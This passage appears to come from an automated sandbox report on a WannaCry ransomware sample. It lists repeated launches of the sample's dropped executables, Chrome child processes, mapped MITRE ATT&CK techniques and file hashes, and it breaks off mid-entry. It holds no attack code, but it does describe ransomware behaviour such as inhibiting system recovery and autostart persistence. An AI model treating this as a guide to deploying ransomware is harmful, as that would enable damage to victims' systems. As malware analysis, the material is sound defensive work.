  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3516
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2328
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4968
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4592
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2468
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6020
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:780
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4704
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1468
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3256
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3320
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3456
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5808
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:940
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3804
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5484
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5424
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5868
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4308
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4224
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3640
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5972
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2232
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1500
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3708
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5876
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1904
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1040
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1048
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3156
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3456
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2988
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3900
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3396
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4004
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  PID:3208
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3924
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:2292
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  PID:3820
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:5800
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5660
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  PID:5864
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4152
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4816
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4912
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:4476
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:4952
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  PID:3708
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4448
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  PID:3404
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2364
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:780
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1756
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  2⤵
  PID:5380
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]
  @[email protected]
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2756
- C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe
  taskdl.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:996

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbc80ecc40,0x7ffbc80ecc4c,0x7ffbc80ecc58
  2⤵
  PID:5492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1856,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1872 /prefetch:2
  2⤵
  PID:5672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2208,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  PID:5696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2296 /prefetch:8
  2⤵
  PID:4280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:5812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3388,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:5796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4524,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4536 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4804,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8
  2⤵
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5060,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:1
  2⤵
  PID:824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3444,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:8
  2⤵
  PID:5960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3196,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4068 /prefetch:8
  2⤵
  PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3360,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:4308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3156,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3408 /prefetch:8
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3172,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  PID:1652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3308,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5024 /prefetch:2
  2⤵
  PID:792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=864,i,15283110700222127484,4048197129301702976,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3476 /prefetch:8
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2856

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:972

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
1KB

MD5
79347cda821d71671d5cc933f21a51f0

SHA1
aa42fb6b75e4c1d148a6a63a0990ea4f9149a2db

SHA256
9d6af90480cf95a10cb4904355a45efc2a5c06efd10351f5eada957a84ef504c

SHA512
9914fd6a15ffc53f6df3414f26145d3a4f5e5226f6238022fb5121dbfe19e81310b41e2d1b85d66552793b74962b91353b2ce55728e0be79248ee41368fa54b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
25db59d6772cfd3fb61ea90f7c9fbe12

SHA1
26d5c1e70370a765b2dbf7f117e5ec8a275567a3

SHA256
15adcdc15ef47c15a49b1a11aa9120d141c72b488669c69112b0f3b04794aee8

SHA512
118316594193f9748fc5ac41c8da2cd9db374f13d6fb90b83a2a949a9274c2a556f73fd81bd65212f6d84a51408e9b162481944944ef18639814da18aeae11ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
137c08a5e601a6bc557c452dddf45eb9

SHA1
ddda672b5ba49091e614c2f855ae39ba98d51f4d

SHA256
d93073a1350be2b599e03b589c36e1c6403338850f8c54e28102977b43a6aa8e

SHA512
93bc28a2cb1e15d04859103a631c8a41757ffd80938bce5c329c6facd1903267491a3c94363174a6fab4f2d7d1514d627e085c00d011e4670b075c1aaccbb8a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5a0958.TMP

Filesize
96B

MD5
8a13837d6705b90a6931535561b804f0

SHA1
868420b2107e34b4bd7acf0bc2f57a4d2495a452

SHA256
6acf48fe872546a8811e8a7ccb9f38f31dc0b5deea0ae395d9ee95c7d4a392c8

SHA512
fa93ab33b89f430eb518d73cc4199a86b54cda9fe73d7fc97f37e3ebcdcd6b26a3889a1745d671c51a080d08752d20562e8088e3f0cf6aa4b2d7e4c4431af494

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\54b80c2f-25c8-4a31-87e2-c07b4883fcc6.tmp

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
20020503c1a6e05f021d1314d8934289

SHA1
902925651d77f2819317b70fe86b8b79a4d35e4d

SHA256
116d0851d603920a0bf590a17356aa28dcecaa46fb7b9cd1ab7737a6cf36ff74

SHA512
f01b2795dc82b25ae1bda8980cb5c08d70249d2770e396e8676d94de947d268a6f2e2bef752dbbd1b1e2d440a926a8da10ffabe835b4334ad1a703053f8c90d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
ada749f6592278aa2de4d00183df74ed

SHA1
83e266cb3460205475ae2ebf6255598ae859de2c

SHA256
d8ad883d31839a1ce9dd8ac79d84d255f979cdc3df07e42ac6c4a42267ea01ab

SHA512
c559d824047a94989d3671ecd2b758eb6c69d6c708487ead6af73b7cc26ee63345199407e0072d570ca7791df06994bbb8d30e7704b5860f907775694464ba10

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
2a2e2c8897b3c0ad92fa3c3f9178c008

SHA1
145afe2f3270b6678c44d64d9005575c5bceb953

SHA256
8363a1205e7ddfa78909b598f71f794da5e4beb48e31544549596f9cf5e6a8bf

SHA512
c481af86c86f3a8a12e98db7a9e0dbd0c4815cda3191f2ae3e958586934ce653c5f9df4e6f056f6211ea85f2b1a7c24e7c960b5d3f68b4b5067ae9f5819052c1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
fed17e286693e0a09b68fc3b32dd0349

SHA1
ec4306ea492afd02afd497c2dd5ea93929dcca1f

SHA256
54db5485144d9a00333dca0cb166c4d6912063a6d0a50b6430cc4292bc6a54d4

SHA512
5d0228892def94fc1e7cf97a8f003b5d8900e39865704b596c03382ee2b841ebe025d294d09c126501ab740ab6b9b6b1216861c170a7d5065c036bf74ccea70b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
009f10fb02863daa0fd719336cd99caa

SHA1
6d745d49424097a61dd18ed109fe0abd0c215990

SHA256
7e735bd0f92ffc0768acac5cf4e823f3cbb333f32c56f80c8e8945e642002b80

SHA512
2f56155502c0663a72bb322f9e66a9902ea676d2b0421b7423acb296ec1bc32e16934040d9a5093b8b542805f2ba8b2698f36e4764fd65eb8cca2b2bc8447058

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
94f3dc3d0644b11b18ee6bbc4b3ce668

SHA1
f7226e35e0137b05e7a98d4bf6766dc73ab06933

SHA256
ed19a14cdae643771599013ea82d778df0caa1ffd0ca3dce5f0de3867476f328

SHA512
